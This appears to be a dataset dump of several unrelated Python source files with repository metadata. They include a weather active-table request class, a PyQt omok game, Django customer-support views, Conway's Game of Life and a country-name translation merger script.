Series(medians).to_csv("low_cov_removed_median.csv",index=False)
Series(means).to_csv("low_cov_removed_means.csv",index=False)
Series(maxs).to_csv("low_cov_removed_maxs.csv",index=False)
Series(mins).to_csv("low_cov_removed_mins.csv",index=False)
Series(lens).to_csv("low_cov_removed_lens.csv",index=False)
print "Write fastas"
with open("left_side.fasta","w") as lefty:
SeqIO.write(left,lefty,"fasta")
with open("right_side.fasta","w") as righty:
SeqIO.write(right,righty,"fasta")
with open("unsure.fasta","w") as unsurey:
SeqIO.write(unsure,unsurey,"fasta")
| [
"mrtz.buck@gmail.com"
] | mrtz.buck@gmail.com |
9bf5e88c23ba62c7ced22432faab87c0a1c3156b | 7a73fef9ae426c48573bae41447cef7cb2b97bf6 | /dynamicserialize/dstypes/com/raytheon/uf/common/activetable/request/MergeActiveTableRequest.py | b3377e84d97d8c41ce0f2b475a4807acc2653016 | [
"LicenseRef-scancode-public-domain",
"BSD-3-Clause"
] | permissive | mjames-upc/python-awips | 7f0a80a04457224c9e195b82a95eef4d9b2b3091 | e2b05f5587b02761df3b6dd5c6ee1f196bd5f11c | refs/heads/master | 2020-03-31T03:00:49.540816 | 2018-10-05T23:15:42 | 2018-10-05T23:15:42 | 53,707,817 | 0 | 0 | null | 2017-04-12T18:00:59 | 2016-03-12T01:46:57 | Python | UTF-8 | Python | false | false | 2,304 | py | ##
##
# File auto-generated against equivalent DynamicSerialize Java class
class MergeActiveTableRequest(object):
    """Request to merge VTEC active-table records on the server.

    ``tableName`` is normalized to upper case in the constructor and
    silently falls back to 'PRACTICE' for unknown values; the setter, in
    contrast, raises ValueError for unknown values.
    """
    def __init__(self, incomingRecords=None, tableName='PRACTICE', site=None,
                 timeOffset=0.0, xmlSource=None, fromIngestAT=False,
                 makeBackups=True):
        # Bug fix: the default used to be a shared mutable list ([]), so
        # records appended to one request leaked into every later request
        # built with the default.  None now means "fresh empty list".
        self.incomingRecords = incomingRecords if incomingRecords is not None else []
        self.site = site
        self.tableName = tableName.upper() if tableName.upper() in ['OPERATIONAL', 'PRACTICE'] else 'PRACTICE'
        self.timeOffset = float(timeOffset)
        self.xmlSource = xmlSource
        self.fromIngestAT = bool(fromIngestAT)
        self.makeBackups = bool(makeBackups)
    def __repr__(self):
        retVal = "MergeActiveTableRequest("
        retVal += repr(self.incomingRecords) + ", "
        retVal += repr(self.tableName) + ", "
        retVal += repr(self.site) + ", "
        retVal += repr(self.timeOffset) + ", "
        retVal += repr(self.xmlSource) + ", "
        retVal += repr(self.fromIngestAT) + ", "
        retVal += repr(self.makeBackups) + ")"
        return retVal
    def __str__(self):
        return self.__repr__()
    def getIncomingRecords(self):
        return self.incomingRecords
    def setIncomingRecords(self, incomingRecords):
        self.incomingRecords = incomingRecords
    def getTableName(self):
        return self.tableName
    def setTableName(self, tableName):
        # Unlike __init__, invalid modes are rejected loudly here.
        value = tableName.upper()
        if value not in ['OPERATIONAL', 'PRACTICE']:
            raise ValueError("Invalid value " + tableName + " specified for ActiveTableMode.")
        self.tableName = value
    def getSite(self):
        return self.site
    def setSite(self, site):
        self.site = site
    def getTimeOffset(self):
        return self.timeOffset
    def setTimeOffset(self, timeOffset):
        self.timeOffset = float(timeOffset)
    def getXmlSource(self):
        return self.xmlSource
    def setXmlSource(self, xmlSource):
        self.xmlSource = xmlSource
    def getFromIngestAT(self):
        return self.fromIngestAT
    def setFromIngestAT(self, fromIngestAT):
        self.fromIngestAT = bool(fromIngestAT)
    def getMakeBackups(self):
        return self.makeBackups
    def setMakeBackups(self, makeBackups):
        self.makeBackups = bool(makeBackups)
| [
"mjames@unidata.ucar.edu"
] | mjames@unidata.ucar.edu |
effd5764d0ea463c16b0501afa0007efd6db1203 | 2422ee49450d11f318a501ed22a77ca1efa586c9 | /HELLOPYTHON/day08/myomok01.py | 607b632cf74bd9020b54a799999adcb6aa3def64 | [] | no_license | Jinny-s/ddit_python_backUp | aefc371afbc4f8d7bdff90682b3fe6bdd93a8c1b | 3fb62e69574b98f8ee935ffff9f37e324a17f771 | refs/heads/master | 2023-05-11T21:48:28.412306 | 2021-05-28T00:13:12 | 2021-05-28T00:13:12 | 369,527,325 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,439 | py | import sys
from PyQt5.QtWidgets import QMainWindow, QApplication
from PyQt5 import uic, QtGui
from PyQt5.Qt import QPushButton, QSize, QRect
form_class = uic.loadUiType("myomok01.ui")[0]
class MyWindow(QMainWindow, form_class):
def __init__(self):
super().__init__()
self.setupUi(self)
self.flag_wb = True
self.pb_reset.clicked.connect(self.pbReset)
self.arr2D = [
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0]
]
self.pb2D = []
for i in range(10):
pb_line = []
for j in range(10):
tmp = QPushButton(self)
tmp.setToolTip(str(i)+","+str(j))
tmp.setIcon(QtGui.QIcon('0.png'))
tmp.setIconSize(QSize(40, 40))
tmp.setGeometry(QRect(40*j,40*i, 40, 40))
tmp.clicked.connect(self.btnClick)
pb_line.append(tmp)
self.pb2D.append(pb_line)
self.myrender()
def myrender(self):
for i in range(10):
for j in range(10):
if self.arr2D[i][j] == 1:
self.pb2D[i][j].setIcon(QtGui.QIcon('1.png'))
elif self.arr2D[i][j] == 2:
self.pb2D[i][j].setIcon(QtGui.QIcon('2.png'))
else:
self.pb2D[i][j].setIcon(QtGui.QIcon('0.png'))
def btnClick(self):
tg = self.sender().toolTip()
i = int(tg.split(',')[0])
j = int(tg.split(',')[1])
if self.arr2D[i][j] > 0:
return
if self.flag_wb:
self.arr2D[i][j] = 1
else:
self.arr2D[i][j] = 2
self.flag_wb = not self.flag_wb
self.myrender()
def pbReset(self):
for i in range(10):
for j in range(10):
self.arr2D[i][j] = 0
self.flag_wb = True
self.myrender()
if __name__ == '__main__':
app = QApplication(sys.argv)
mywindow = MyWindow()
mywindow.show()
app.exec_() | [
"46083003+Jinny-s@users.noreply.github.com"
] | 46083003+Jinny-s@users.noreply.github.com |
7a5c1835b9399907b133264cb54216162991db72 | 0a775e8d1057b2608a8d46499124105776ff4062 | /web/manage.py | c5cff1a9dce87821e9827c52812f60cd4df2e7c3 | [
"MIT"
] | permissive | x5g/CubeSolver | f3a1ad6e5e3bd5a2becc10a002d473f2902ec867 | 451ae8f580038d3840cd9279cbdbcd2c13f5045d | refs/heads/master | 2022-07-19T06:59:53.505115 | 2021-04-30T16:09:47 | 2021-04-30T16:09:47 | 217,885,447 | 1 | 1 | MIT | 2022-06-22T02:38:46 | 2019-10-27T16:44:49 | Python | UTF-8 | Python | false | false | 630 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Entry point: configure settings and dispatch to Django's CLI."""
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'CubeSolver.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        message = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(message) from exc
    execute_from_command_line(sys.argv)
if __name__ == '__main__':
    main()
| [
"1098766468@qq.com"
] | 1098766468@qq.com |
5a2be43121e2fbabfc3199ed5c3014b5bf1cd034 | 803ff496aff9eef77f3186991878b6f16e54ba0a | /customer_support/views.py | 83fd375d8b727d67dc000ab4457b99c6ea137792 | [] | no_license | gopal1992/ssadmin | c54dae22dd69e48730affc1cdba0c0ee17b1e48c | 96370e8fc108843a70b326d5b136be94ae0b3084 | refs/heads/master | 2016-09-09T22:44:35.003945 | 2015-01-24T10:15:12 | 2015-01-24T10:15:12 | 29,772,729 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 18,570 | py | # -*- coding: utf-8 -*-
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.shortcuts import render, redirect
from django.views.decorators.http import require_http_methods
from django.views.generic import TemplateView
from django.views.generic.edit import FormView, UpdateView
from accounts.services import (create_user_without_password,
grant_privilege)
from dal.registration import get_list_latest_internal_sid_subscribers
from ip_analysis.models import UserSubscriber, Subscriber
from service_layer.registration import get_unique_external_sid
from user_analysis.models import SubscriberPageAuth, PagesList, PageAuthAction
from utils.account import ShieldSquareUserMixin
from utils.email import send_templated_email
from .forms import (NewSubscriberForm,
UpdateSubscriberForm,
EditSubscriberForm,
NewUserForm,
DeActivateSubscriberForm,
ReActivateSubscriberForm,
SupportSubscriberReportForm,)
from .service import send_new_user_email
# Create your views here.
class NewUserView(ShieldSquareUserMixin, FormView):
    """Support view: create a dashboard user linked to a subscriber.

    On success the user is granted the requested privilege, linked to the
    subscriber, and both the operator and the new user are notified.
    """
    form_class = NewUserForm
    template_name = 'new_user.html'
    def send_email(self, email):
        # Notify the support operator about the account they just created.
        msg = u"You have created a new user {}".format(email)
        send_templated_email(label="customer_support",
                            to=self.request.user.email,
                            context={'user_name': self.request.user, 'msg': msg})
    def form_valid(self, form):
        username = form.cleaned_data['username']
        email = form.cleaned_data['email']
        privilege = form.cleaned_data['privilege']
        subscriber = form.cleaned_data['subscriber']
        user = create_user_without_password(email, username)
        if user:
            grant_privilege(user, privilege)
            UserSubscriber.objects.create(user=user, subscriber=subscriber)
            self.send_email(email)
            # comes from service.py
            send_new_user_email(self.request, user)
            messages.success(self.request,
                             u"{} successfully created.".format(email))
        else:
            # Bug fix: previously the notification e-mails and the success
            # message fired even when user creation failed (user=None),
            # which broke send_new_user_email and misled the operator.
            messages.error(self.request,
                           u"Unable to create user {}".format(email))
        return render(self.request, self.template_name)
    def form_invalid(self, form):
        return render(self.request, self.template_name, {'form': form})
class NewSubscriberView(ShieldSquareUserMixin, FormView):
    """Support view: create a subscriber plus its initial admin user."""
    form_class = NewSubscriberForm
    template_name = "new_subscriber.html"
    def send_email(self, name):
        # Notify the support operator about the subscriber they created.
        msg = u"You have created a new subscriber {}".format(name)
        return send_templated_email(label="customer_support",
                                    to=self.request.user.email,
                                    context={'user_name': self.request.user, 'msg': msg})
    def form_valid(self, form):
        subscriber = form.save(commit=True)
        self.send_email(subscriber.name)
        # Bootstrap an admin account for the new subscriber.
        user = create_user_without_password(subscriber.email)
        if user:
            send_new_user_email(self.request, user)
            grant_privilege(user, "admin")
            UserSubscriber.objects.create(user=user, subscriber=subscriber)
            messages.success(
                self.request,
                u"Successfully created subscriber {}".format(subscriber.name)
            )
        else:
            # Bug fix: this used to reference `self.requet`, raising
            # AttributeError whenever user creation failed.
            messages.error(
                self.request,
                u"Unable to create user {}".format(subscriber.email)
            )
            return render(self.request, self.template_name)
        return redirect(reverse('support.dashboard'))
class UpdateSubscriberView(ShieldSquareUserMixin, UpdateView):
    """Persist edits to an existing subscriber and notify the operator."""
    model = Subscriber
    form_class = UpdateSubscriberForm
    template_name = "update_subscriber.html"
    def send_email(self, name):
        notification = u"You have updated subscriber {} details".format(name)
        email_context = {'user_name': self.request.user, 'msg': notification}
        return send_templated_email(label="customer_support",
                                    to=self.request.user.email,
                                    context=email_context)
    def form_valid(self, form):
        updated = form.save(commit=True)
        self.send_email(updated.name)
        success_text = u"Successfully edited subscriber {}".format(updated.name)
        messages.success(self.request, success_text)
        return redirect(reverse('support.dashboard'))
class EditSubscriberView(ShieldSquareUserMixin, FormView):
    """Subscriber picker; the actual edit happens in UpdateSubscriberView."""
    form_class = EditSubscriberForm
    template_name = "edit_subscriber.html"
    def form_valid(self, form):
        chosen = form.cleaned_data['subscriber']
        target = reverse('support.update_subscriber',
                         kwargs={'pk': chosen.internal_sid})
        return redirect(target)
class DeActivateSubscriberView(ShieldSquareUserMixin, FormView):
    """Disable a subscriber and deactivate every user tied to it."""
    form_class = DeActivateSubscriberForm
    template_name = "deactivate_subscriber.html"
    def send_email(self, name):
        notification = u"You have disabled the subscriber {}".format(name)
        return send_templated_email(label="customer_support",
                                    to=self.request.user.email,
                                    context={'user_name': self.request.user,
                                             'msg': notification})
    def deactivate_all_associated_users(self, subscriber):
        # Flip is_active off for every user linked to this subscriber.
        links = UserSubscriber.objects.filter(subscriber=subscriber)
        for link in links:
            link.user.is_active = False
            link.user.save()
    def form_valid(self, form):
        subscriber = form.cleaned_data['subscriber']
        subscriber.status = 0
        subscriber.save()
        self.deactivate_all_associated_users(subscriber)
        messages.success(self.request,
                         u"{} is disabled".format(subscriber.name))
        self.send_email(subscriber.name)
        return redirect(reverse('support.dashboard'))
class ReActivateSubscriberView(ShieldSquareUserMixin, FormView):
    """Re-enable a subscriber and reactivate every user tied to it."""
    form_class = ReActivateSubscriberForm
    template_name = "reactivate_subscriber.html"
    def send_email(self, name):
        # Notify the support operator that the subscriber was re-enabled.
        msg = u"You have enabled the subscriber {}".format(name)
        return send_templated_email(label="customer_support",
                                    to=self.request.user.email,
                                    context={'user_name': self.request.user, 'msg': msg})
    def reactivate_all_associated_users(self, subscriber):
        # Renamed from `deactivate_all_associated_users` (a copy-paste
        # misnomer from DeActivateSubscriberView): this view *enables*
        # the subscriber's users.
        for user_subscriber in UserSubscriber.objects.filter(subscriber=subscriber):
            user_subscriber.user.is_active = True
            user_subscriber.user.save()
    # Backward-compatible alias in case any external code used the old name.
    deactivate_all_associated_users = reactivate_all_associated_users
    def form_valid(self, form):
        subscriber = form.cleaned_data['subscriber']
        subscriber.status = 1
        subscriber.save()
        self.reactivate_all_associated_users(subscriber)
        messages.success(self.request,
                         u"{} is enabled".format(subscriber.name))
        self.send_email(subscriber.name)
        return redirect(reverse('support.dashboard'))
class SupportSubscriberReportView(ShieldSquareUserMixin, FormView):
    """Stash the chosen subscriber in the session and jump to a report."""
    form_class = SupportSubscriberReportForm
    template_name = "support_report.html"
    def form_valid(self, form):
        chosen = form.cleaned_data['subscriber']
        session = self.request.session
        session['sid'] = chosen.internal_sid
        session['subscriber_name'] = chosen.name
        return redirect(form.cleaned_data['reports'])
class DashboardView(ShieldSquareUserMixin, TemplateView):
    """Customer-support landing page; purely template-driven."""
    template_name = "support_dashboard.html"
@require_http_methods(["GET", "POST"])
def add_new_subscriber(request):
    """Create a subscriber with page permissions (function-based flow).

    GET renders an empty NewSubscriberForm; POST validates it, creates
    the Subscriber (plus a sandbox "sb_" twin id), its four page
    permission rows, an admin user, and e-mails the operator.
    """
    form = NewSubscriberForm()
    if request.method == 'GET':
        return render(request, 'new_subscriber.html', {'form' : form})
    form = NewSubscriberForm(request.POST)
    if form.is_valid():
        # Allocate new internal/external ids; +2 and +3 leave room for the
        # sandbox twin.  NOTE(review): not race-safe under concurrent
        # requests -- no transaction/lock visible here; confirm upstream.
        latest_internal_sid = get_list_latest_internal_sid_subscribers()
        external_sid = get_unique_external_sid()
        new_external_sid = str(external_sid[0])
        new_sb_external_sid = str(external_sid[1])
        sid = Subscriber.objects.create(internal_sid = latest_internal_sid + 2,
                        external_sid = new_external_sid,
                        mini_uuid = new_external_sid.split('-')[3],
                        name = form.cleaned_data['name'],
                        site_url = form.cleaned_data['site_url'],
                        address1 = form.cleaned_data['address1'],
                        address2 = form.cleaned_data['address2'],
                        phone1 = form.cleaned_data['phone1'],
                        phone2 = form.cleaned_data['phone2'],
                        email = form.cleaned_data['email'],
                        status = form.cleaned_data['status'],
                        timezone = form.cleaned_data['timezone'],
                        r_Pagepermin = form.cleaned_data['r_Pagepermin'],
                        r_browserIntgrity = form.cleaned_data['r_browserIntgrity'],
                        r_httpRequestIntegrity = form.cleaned_data['r_httpRequestIntegrity'],
                        r_Aggregator = form.cleaned_data['r_Aggregator'],
                        r_behaviourIntegrity = form.cleaned_data['r_behaviourIntegrity'],
                        mode = form.cleaned_data['mode'],
                        sb_internal_sid = latest_internal_sid + 3,
                        sb_external_sid = new_sb_external_sid,
                        sb_mini_uuid = new_sb_external_sid.split('-')[3]
                        )
        # Page permissions: auth id 1 apparently means "allow", 2 "deny"
        # -- TODO confirm against PageAuthAction fixtures.
        # NOTE(review): here page id 3 -> ip_analysis and 4 -> ip_access,
        # but update_existing_subscriber maps them the other way around;
        # one of the two is likely wrong -- verify against PagesList.
        SubscriberPageAuth.objects.create(sid = sid,
                        page_id = PagesList.objects.get(id = 1),
                        auth_id = PageAuthAction.objects.get(id = 1 if form.cleaned_data['user_access_page'] else 2))
        SubscriberPageAuth.objects.create(sid = sid,
                        page_id = PagesList.objects.get(id = 2),
                        auth_id = PageAuthAction.objects.get(id = 1 if form.cleaned_data['user_analysis_page'] else 2))
        SubscriberPageAuth.objects.create(sid = sid,
                        page_id = PagesList.objects.get(id = 3),
                        auth_id = PageAuthAction.objects.get(id = 1 if form.cleaned_data['ip_analysis_page'] else 2))
        SubscriberPageAuth.objects.create(sid = sid,
                        page_id = PagesList.objects.get(id = 4),
                        auth_id = PageAuthAction.objects.get(id = 1 if form.cleaned_data['ip_access_page'] else 2))
        # Email
        msg = u"You have created a new subscriber {}".format(sid.name)
        send_templated_email(label="customer_support",
                             to=request.user.email,
                             context={'user_name':request.user,'msg': msg})
        user = create_user_without_password(sid.email)
        if user:
            send_new_user_email(request, user)
            grant_privilege(user, "admin")
            UserSubscriber.objects.create(user=user, subscriber=sid)
            messages.success(
                request,
                u"Successfully created subscriber {}".format(sid.name)
            )
        else:
            messages.error(
                request,
                u"Unable to create user {}".format(sid.email)
            )
            return render(request, 'new_subscriber.html')
        return redirect(reverse('support.dashboard'))
    return render(request, 'new_subscriber.html', {'form' : form})
@require_http_methods(["GET", "POST"])
def update_existing_subscriber(request, pk):
    """Edit an existing subscriber and its four page permissions.

    GET pre-fills UpdateSubscriberForm from the Subscriber row and its
    SubscriberPageAuth rows; POST saves the changes and e-mails the
    operator.
    """
    form = UpdateSubscriberForm()
    sid = Subscriber.objects.get(pk = pk)
    if request.method == 'GET':
        # NOTE(review): page id 3 -> ip_access and 4 -> ip_analysis here,
        # the opposite of add_new_subscriber; verify which mapping is
        # correct against PagesList.
        user_access_page = SubscriberPageAuth.objects.get(sid=sid, page_id = PagesList.objects.get(id = 1))
        user_analysis_page = SubscriberPageAuth.objects.get(sid=sid, page_id = PagesList.objects.get(id = 2))
        ip_access_page = SubscriberPageAuth.objects.get(sid=sid, page_id = PagesList.objects.get(id = 3))
        ip_analysis_page = SubscriberPageAuth.objects.get(sid=sid, page_id = PagesList.objects.get(id = 4))
        # auth_id.id == 1 is treated as "allowed" when pre-filling.
        form = UpdateSubscriberForm( initial = {
                            'name' : sid.name,
                            'address1' : sid.address1,
                            'address2' : sid.address2,
                            'phone1' : sid.phone1,
                            'phone2' : sid.phone2,
                            'status' : sid.status,
                            'timezone' : sid.timezone,
                            'pagepermin' : sid.pagepermin,
                            'pagepersess' : sid.pagepersess,
                            'sesslength' : sid.sesslength,
                            'r_Pagepermin' : sid.r_Pagepermin,
                            'r_pagepersess' : sid.r_pagepersess,
                            'r_sesslength' : sid.r_sesslength,
                            'r_browserIntgrity' : sid.r_browserIntgrity,
                            'r_httpRequestIntegrity' : sid.r_httpRequestIntegrity,
                            'r_Aggregator' : sid.r_Aggregator,
                            'r_behaviourIntegrity' : sid.r_behaviourIntegrity,
                            'mode' : sid.mode,
                            'user_access_page' : True if user_access_page.auth_id.id==1 else False,
                            'user_analysis_page' : True if user_analysis_page.auth_id.id==1 else False,
                            'ip_access_page' : True if ip_access_page.auth_id.id==1 else False,
                            'ip_analysis_page' : True if ip_analysis_page.auth_id.id==1 else False,
                             })
        return render(request, 'update_subscriber.html', {'form' : form,
                                                          'internal_sid' : sid.internal_sid,
                                                          'external_sid' : sid.external_sid,})
    form = UpdateSubscriberForm(request.POST)
    if form.is_valid():
        sid = Subscriber.objects.get(pk = pk)
        sid.name = form.cleaned_data['name']
        sid.address1 = form.cleaned_data['address1']
        sid.address2 = form.cleaned_data['address2']
        sid.phone1 = form.cleaned_data['phone1']
        sid.phone2 = form.cleaned_data['phone2']
        sid.status = form.cleaned_data['status']
        sid.timezone = form.cleaned_data['timezone']
        sid.r_Pagepermin = form.cleaned_data['r_Pagepermin']
        sid.r_browserIntgrity = form.cleaned_data['r_browserIntgrity']
        sid.r_httpRequestIntegrity = form.cleaned_data['r_httpRequestIntegrity']
        sid.r_Aggregator = form.cleaned_data['r_Aggregator']
        sid.r_behaviourIntegrity = form.cleaned_data['r_behaviourIntegrity']
        sid.mode = form.cleaned_data['mode']
        sid.save()
        user_access_page = SubscriberPageAuth.objects.get(sid = sid,
                                                    page_id = PagesList.objects.get(id = 1))
        user_analysis_page = SubscriberPageAuth.objects.get(sid = sid,
                                                    page_id = PagesList.objects.get(id = 2))
        ip_access_page = SubscriberPageAuth.objects.get(sid = sid,
                                                    page_id = PagesList.objects.get(id = 3))
        ip_analysis_page = SubscriberPageAuth.objects.get(sid = sid,
                                                    page_id = PagesList.objects.get(id = 4))
        # NOTE(review): looked up by auth_action (1/0) here, but by id
        # (1/2) in add_new_subscriber -- confirm both resolve to the same
        # allow/deny rows.
        user_access_page.auth_id = PageAuthAction.objects.get(auth_action = 1 if form.cleaned_data['user_access_page'] else 0)
        user_analysis_page.auth_id = PageAuthAction.objects.get(auth_action = 1 if form.cleaned_data['user_analysis_page'] else 0)
        ip_access_page.auth_id = PageAuthAction.objects.get(auth_action = 1 if form.cleaned_data['ip_access_page'] else 0)
        ip_analysis_page.auth_id = PageAuthAction.objects.get(auth_action = 1 if form.cleaned_data['ip_analysis_page'] else 0)
        user_access_page.save()
        user_analysis_page.save()
        ip_access_page.save()
        ip_analysis_page.save()
        # Email
        msg = u"You have updated subscriber {} details".format(sid.name)
        send_templated_email(label="customer_support",
                             to=request.user.email,
                             context={'user_name':request.user,'msg': msg})
        messages.success(request, u"Successfully edited subscriber {}".format(sid.name))
        return redirect(reverse('support.dashboard'))
    return render(request, 'update_subscriber.html', {'form' : form,
                                                      'internal_sid' : sid.internal_sid,
                                                      'external_sid' : sid.external_sid,})
"git@github.com"
] | git@github.com |
fa828b53566c090450afc3f58298ab733534ac3e | 11cf40946c55b47886cfe8777916a17db82c2309 | /conways1.py | a2da35410469f1db5aecd4755355f109e8add686 | [] | no_license | dalalsunil1986/python_the_hard_way_exercises | fc669bf2f823a4886f0de717d5f1ca0d0233f6af | bc329999490dedad842e23e8447623fd0321ffe0 | refs/heads/master | 2023-05-03T01:35:24.097087 | 2021-05-16T00:43:56 | 2021-05-16T00:43:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,840 | py | # Conway's Game of Life
import random, time, copy
WIDTH = 60
HEIGHT = 20
# Create a list of list for the cells:
nextCells = []
for x in range(WIDTH):
column = [] # Create a new column.
for y in range(HEIGHT):
if random.randint(0, 1) == 0:
column.append('O') # Add a living cell.
else:
column.append(' ') # Add a dead cell.
nextCells.append(column) # nextCells is a list of column lists.
while True: # Main program loop.
print('\n\n\n\n\n') # Separate each step with newlines.
currentCells = copy.deepcopy(nextCells)
# Print currentCells on the screen:
for y in range(HEIGHT):
for x in range(WIDTH):
print(currentCells[x][y], end='') # Print the 'O' or space.
print() # Print a newline at the end of the row.
# Calculate next step's cells based on current step's cells:
for x in range(WIDTH):
for y in range(HEIGHT):
# Get neighboring coordinates:
# '% WIDTH' ensures leftCoord is always between 0 and WIDTH -1
leftCoord = (x - 1) % WIDTH
rightCoord = (x + 1) % WIDTH
aboveCoord = (y - 1) % HEIGHT
belowCoord = (y + 1) % HEIGHT
# Count number of living neighbors:
numNeighbors = 0
if currentCells[leftCoord][aboveCoord] == '#':
numNeighbors += 1 # Top-left neighbor is alive.
if currentCells[x][aboveCoord] == '#':
numNeighbors += 1 # Top neighbor is alive.
if currentCells[rightCoord][aboveCoord] == '#':
numNeighbors += 1 # Top-right neighbor is alive.
if currentCells[leftCoord][y] == '#':
numNeighbors += 1 # Left neighbor is alive.
if currentCells[rightCoord][y] == '#':
numNeighbors += 1 # Right neighbor is alive.
if currentCells[leftCoord][belowCoord] == '#':
numNeighbors += 1 # Botton-left neighbor is alive.
if currentCells[x][belowCoord] == '#':
numNeighbors += 1 # Botton neighbor is alive.
if currentCells[rightCoord][belowCoord] == '#':
numNeighbors += 1 # Bottom-right neighbor is alive.
# Set cell based on Conway's Game of Life rules:
if currentCells[x][y] == '#' and (numNeighbors == 2 or numNeighbors == 3):
# Living cells with 2 or 3 neighbors stay alive:
nextCells[x][y] = '#'
elif currentCells[x][y] == ' ' and numNeighbors == 3:
# Dead cells with 3 neighbors become alive:
nextCells[x][y] = '#'
else:
# Everthing else dies or stays dead:
nextCells[x][y] = ' '
time.sleep(2) # Add 2-second pause to reduce flickering.
| [
"mathiasgreg@gmail.com"
] | mathiasgreg@gmail.com |
ea10ff333638751d103c53c4fa8ba2f3e8e317e3 | a1f832c9a9f4d55f93c75ce6a124ebc96ea633e3 | /mapping/script/merger.py | 8d7ef7d6862fad481e618d5bec325c1685f95438 | [
"Apache-2.0"
] | permissive | bennymeg/IsraelPostalServiceAPI | 8409308e7a9e3f1d26c260efa71001b8d0ff7ce2 | 4cb18c2fe64e709b0864853ba3ea361b83a4470d | refs/heads/master | 2023-03-22T17:22:34.490674 | 2021-10-08T12:06:20 | 2021-10-08T12:06:20 | 152,899,161 | 5 | 2 | Apache-2.0 | 2023-03-04T02:55:42 | 2018-10-13T17:52:52 | TypeScript | UTF-8 | Python | false | false | 4,007 | py | # Copyright 2019 Benny Megidish
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import codecs
import json
from googletrans import Translator
"""
This script combines all possible country destinations into json files
@author Benny Megidish
"""
def _getAdjacentDirectory(adjacentDirectoryName):
return os.path.join(os.path.dirname(os.getcwd()), adjacentDirectoryName)
def getEnMappingDirectory():
    # Sibling 'en' directory: holds the English mapping files.
    return _getAdjacentDirectory("en")
def getHeMappingDirectory():
    # Sibling 'he' directory: holds the Hebrew mapping CSV files.
    return _getAdjacentDirectory("he")
def getOutputDirectory():
    # Sibling 'data' directory: destination for the generated json files.
    return _getAdjacentDirectory("data")
def createEnCountryDict(filename):
    """Load the English country mapping CSV into an {id: name} dict.

    Each line has the form "<id>, <name>"; the name keeps its trailing
    newline exactly as the original code left it.
    Fix: the file handle was opened and never closed -- use a context manager.
    """
    en_country_dict = dict()
    with open(os.path.join(getEnMappingDirectory(), filename)) as en_country_map:
        for line in en_country_map:
            (_id, name) = line.split(', ', 1)
            en_country_dict[_id] = name
    return en_country_dict
def translate(text):
    """Best-effort Hebrew->English translation via the module-level googletrans
    Translator; returns a 'TODO_' marker string on any failure.

    Fix: the original bare ``except:`` also swallowed SystemExit and
    KeyboardInterrupt; catch Exception instead.
    """
    try:
        translated_name = translator.translate(text, src='iw', dest='en').text
    except Exception:
        # googletrans fails sporadically (network / API changes); degrade gracefully
        translated_name = "TODO_" + text
    return translated_name
def merge(mappingSourceFilename, debug=False):
    ''' Iterates over every csv file in the Hebrew input directory and generates an English json dictionary for each file. '''
    he_directory_path = getHeMappingDirectory()
    he_directory = os.fsencode(he_directory_path)
    output_directory_path = getOutputDirectory()
    # id -> English name lookup built from the mapping source file
    en_country_dict = createEnCountryDict(mappingSourceFilename)
    for _file in os.listdir(he_directory):
        filename = os.fsdecode(_file)
        if filename.endswith(".csv"):
            input_file_path = os.path.join(he_directory_path, filename)
            # shipping-method token: third dash-separated part of the file name
            method_type = filename.replace(".csv", "-").split('-')[2].upper()
            method_type = "ALL" if method_type == '' else method_type
            output_file_path = os.path.join(output_directory_path, filename).replace(".csv", ".json")
            output_dict_file = dict()
            # read input country csv file
            with open(input_file_path, "r", encoding="utf8") as map_file:
                # create output country json file
                for line in map_file:
                    (_id, name) = line.split(', ', 1)
                    name = name.rstrip()
                    # NOTE(review): `_id in en_country_dict` is the idiomatic spelling.
                    if en_country_dict.__contains__(_id):
                        output_dict_file[en_country_dict[_id].rstrip()] = {'id': _id, 'name': name}
                        #map_file.write('%s, %s' % (line.rstrip(), en_country_dict[_id]))
                        if debug:
                            translated_name = translate(name)
                            # name[::-1] reverses the Hebrew string for LTR console output
                            print("%s: %s -> %s [%s]" % (method_type, name[::-1], en_country_dict[_id].rstrip(), translated_name))
                    else:
                        # id missing from the English mapping: fall back to machine translation
                        translated_name = translate(name)
                        output_dict_file[translated_name] = {'id': _id, 'name': name}
                        print("%s: Can't translate %s into English, defaulting to %s (google)" % (method_type, name[::-1], translated_name))
                        #map_file.write('%s, %s\n' % (line.rstrip(), "TODO"))
            # NOTE(review): always true -- output_dict_file is a dict, never None
            if (output_dict_file != None):
                # save output json file
                os.makedirs(getOutputDirectory(), exist_ok=True)
                with codecs.open(output_file_path, "w", encoding="utf-8-sig") as map_file:
                    json.dump(output_dict_file, map_file)
if __name__ == "__main__":
translator = Translator()
merge('destination-map.csv') | [
"bennymegk@gmail.com"
] | bennymegk@gmail.com |
